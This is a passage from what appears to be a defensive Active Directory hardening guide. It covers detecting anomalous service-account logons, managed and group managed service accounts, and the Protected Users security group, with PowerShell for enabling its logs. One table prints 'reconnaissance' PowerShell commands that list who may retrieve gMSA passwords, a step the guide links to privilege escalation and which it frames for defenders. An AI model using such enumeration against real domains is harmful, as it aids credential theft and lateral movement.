100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anomalous Logon from a Service Account</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for login attempts for a service account on a new (unexpected) endpoint. This will require baselining service accounts to expected (approved) systems.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 23: Detection opportunities for service account logons</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Managed/Group Managed Service Accounts</span></h4> <p><span style="vertical-align: baseline;">Organizations with static service accounts should review the feasibility of migrating the service accounts to be managed service accounts (MSAs) or group managed service accounts (gMSAs).</span></p> <p><span style="vertical-align: baseline;">MSAs were first introduced with the Windows Server 2008 R2 Active Directory schema (domain-functional level) and provide automatic password management (30-day rotation) for dedicated service accounts that are associated with running services on specific endpoints.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Standard MSA: The account is associated with a single endpoint, and the complex password for the account is automatically managed and changed on a predefined frequency (30 days by default). While an MSA can only be associated with a single computer account, multiple services on the same endpoint can leverage the MSA.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Group managed service account (gMSA): First introduced with Windows Server 2012 and are very similar to MSAs, but allow for a single gMSA to be leveraged across </span><span style="font-style: italic; vertical-align: baseline;">multiple</span><span style="vertical-align: baseline;"> endpoints.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Common uses for MSAs and gMSAs:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Scheduled Tasks</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Internet Information Services (IIS) application pools</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Structured Query Language (SQL) services (SQL 2012 and later) – Express editions are </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> supported by MSAs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Microsoft Exchange services</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Network Load Balancing (clustering) – gMSAs only</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Third-party applications that support MSAs</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Threat actors can potentially discover accounts and groups that have permissions to read/leverage the password for a gMSA for privilege escalation and lateral movement. This can be accomplished by leveraging the </span><code style="vertical-align: baseline;">get-adserviceaccount</code><span style="vertical-align: baseline;"> PowerShell cmdlet and enumerating the </span><code style="vertical-align: baseline;">msDS-GroupMSAMembership</code><span style="vertical-align: baseline;"> (</span><code style="vertical-align: baseline;">PrincipalsAllowedToRetrieveManagedPassword</code><span style="vertical-align: baseline;">) configuration for a gMSA, which stores the security principals that can access the gMSA password. It is important that when configuring managed service accounts, organizations focus on restricting the scope of accounts and groups that have the ability to obtain and leverage the password for the managed service accounts and enforce structured monitoring of these accounts and groups.</span></p> <p><span style="vertical-align: baseline;">For additional information related to MSAs and gMSAs, reference:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/managed-service-accounts-understanding-implementing-best/ba-p/397009" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/managed-service-accounts-understanding-implementing-best/ba-p/397009</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview</span></a></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Managed/Group Managed Service Accounts</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Group Membership Addition</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1069/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1069 – Permission Groups Discovery</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098 – Account Manipulation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for MSAs/gMSAs and the associated </span><code style="vertical-align: baseline;">PrincipalsAllowedToRetrieveManagedPassword</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">PrincipalsAllowedToDelegateToAccount</code><span style="vertical-align: baseline;"> permissions, which could provide the ability to leverage the MSA/gMSA for malicious purposes.</span></p> <p><span style="vertical-align: baseline;">Example reconnaissance commands for querying for MSAs/gMSAs and associated attributes:<br/><br/></span></p> <pre class="language-plain"><code>get-adserviceaccount get-adserviceaccount -filter {name -eq 'account-name'} -prop * | select Name, MemberOf, PrincipalsAllowedToDelegateToAccount, PrincipalsAllowedToRetrieveManagedPassword</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 34: Example reconnaissance commands for querying for MSAs/gMSAs</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 24: Detection opportunities for managed/group managed service accounts</span></div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Protected Users Security Group</span></h4> <p><span style="vertical-align: baseline;">By leveraging the Protected Users security group for privileged accounts, an organization can minimize various exposure factors and common exploitation methods by a threat actor or malware variant obtaining credentials for privileged accounts on disk or in memory from endpoints.</span></p> <p><span style="vertical-align: baseline;">Beginning with Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2 (and above), the Protected Users security group was introduced to manage credential exposure within an environment. Members of this group automatically have specific protections applied to accounts, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Kerberos ticket granting ticket (TGT) expires after four hours, rather than the normal 10-hour default setting.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">No NTLM hash for an account is stored in LSASS, since only Kerberos authentication is used (NTLM authentication is disabled for an account).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Cached credentials are blocked. A domain controller must be available to authenticate the account.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">WDigest authentication is disabled for an account, regardless of an endpoint's applied policy settings.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">DES and RC4 cannot be used for Kerberos preauthentication (Server 2012 R2 or higher); rather, Kerberos with AES encryption will be enforced.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Accounts cannot be used for either constrained or unconstrained delegation (equivalent to enforcing the </span><span style="font-style: italic; vertical-align: baseline;">Account is sensitive and cannot be delegated</span><span style="vertical-align: baseline;"> setting in Active Directory Users and Computers).</span></p> </li> </ul> <p><span style="vertical-align: baseline;">To provide domain controller-side restrictions for members of the Protected Users security group, the domain functional level must be Windows Server 2012 R2 (or higher). Microsoft Security Advisory </span><a href="https://msrc-blog.microsoft.com/2014/06/05/an-overview-of-kb2871997/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">KB2871997</span></a><span style="vertical-align: baseline;"> adds compatibility support for the protections enforced for members of the Protected Users security group for Windows 7, Windows Server 2008 R2, and Windows Server 2012 systems.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Successful (Event IDs 303, 304) or failed (Event IDs 100, 104) logon events for members of the Protected Users security group can be recorded on domain controllers within the following event logs:</span></p> <ul> <li role="presentation" style="text-align: left;"> <pre class="language-plain"><code>%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserSuccesses-DomainController.evtx</code></pre> </li> <li role="presentation"> <pre class="language-plain"><code>%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserFailures-DomainController.evtx</code></pre> </li> </ul> <p><span style="vertical-align: baseline;">The event logs are disabled by default and must be enabled on each domain controller. The PowerShell cmdlets referenced in Figure 35 can be leveraged to enable the event logs for the Protected Users security group on a domain controller.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>$log1 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController $log1.IsEnabled=$true $log1.SaveChanges() $log2 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController $log2.IsEnabled=$true $log2.SaveChanges()</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 35: PowerShell cmdlets for enabling event logging for the Protected Users security group on domain controllers</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">Service accounts (including MSAs) should </span><strong style="vertical-align: baseline;">not</strong><span style="vertical-align: baseline;"> be added to the Protected Users security group, as authentication will fail.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><span style="vertical-align: baseline;">If the Protected Users security group cannot be used, at a minimum, privileged accounts should be protected against delegation by configuring the account with the </span><span style="font-style: italic; vertical-align: baseline;">Account is Sensitive and Cannot Be Delegated</span><span style="vertical-align: baseline;"> flag in Active Directory.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for the Protected Users Security Group</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; 